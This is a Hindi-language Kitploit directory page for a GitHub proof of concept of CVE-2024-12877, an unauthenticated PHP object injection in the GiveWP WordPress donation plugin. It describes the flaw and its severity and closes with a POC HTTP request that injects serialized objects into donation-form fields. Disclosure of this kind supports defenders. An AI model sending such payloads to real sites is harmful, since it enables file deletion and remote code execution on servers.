Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-12877
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubrandomrobbiebf/cve-2024-12877

CVE-2024-12877

GiveWP – दान प्लगइन और फंडरेज़िंग प्लेटफ़ॉर्म <= 3.19.2 - बिना प्रमाणीकरण के PHP Object Injection

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-12877

GiveWP – डोनेशन प्लगइन और फंडरेजिंग प्लेटफ़ॉर्म <= 3.19.2 - बिना प्रमाणीकरण के PHP ऑब्जेक्ट इंजेक्शन

विवरण

वर्डप्रेस के लिए GiveWP – डोनेशन प्लगइन और फंडरेजिंग प्लेटफ़ॉर्म प्लगइन, संस्करण 3.19.2 तक (सम्मिलित) के सभी संस्करणों में, दान फ़ॉर्म से अविश्वसनीय इनपुट जैसे 'firstName' के deserialization के माध्यम से PHP ऑब्जेक्ट इंजेक्शन के प्रति संवेदनशील है। यह बिना प्रमाणीकरण वाले हमलावरों के लिए एक PHP ऑब्जेक्ट इंजेक्ट करना संभव बनाता है। POP chain की अतिरिक्त उपस्थिति हमलावरों को सर्वर पर मनमानी फ़ाइलें हटाने की अनुमति देती है, जिससे रिमोट कोड निष्पादन संभव हो जाता है। कृपया ध्यान दें कि इसे केवल 3.19.3 में आंशिक रूप से पैच किया गया था, पूर्ण पर्याप्त पैच 3.19.4 तक जारी नहीं किया गया था। हालाँकि, एक अन्य CNA द्वारा संस्करण 3.19.3 के लिए एक अलग CVE निर्दिष्ट किया गया था, इसलिए हम इसे 3.19.2 और उससे पहले के संस्करणों को प्रभावित करने वाला मानेंगे। हमने विक्रेता को JSON एन्कोडिंग का उपयोग करने की सिफारिश की है ताकि आगे कोई भी deserialization भेद्यता मौजूद न रहे।

विवरण

  • प्रकार: प्लगइन
  • Slug: give
  • प्रभावित संस्करण: 3.19.2
  • CVSS स्कोर: 9.8
  • CVSS रेटिंग: क्रिटिकल
  • CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-12877
  • स्थिति: सक्रिय

POC

root@kitploit:~
POST /?givewp-route=donate&givewp-route-signature=[SIGNATURE]&givewp-route-signature-id=givewp-donate&givewp-route-signature-expiration=[EXPIRY] HTTP/1.1
Host: kubernetes.docker.internal:8929
Content-Type: application/x-www-form-urlencoded
Content-Length: 163

amount=10&currency=USD&gatewayId=manual&formId=90&company=O:20:"PHP_Object_Injection":0:{}&firstName=O:20:"PHP_Object_Injection":0:{}&[email protected]&donationType=single&donationBirthday=
टूल डाउनलोड करें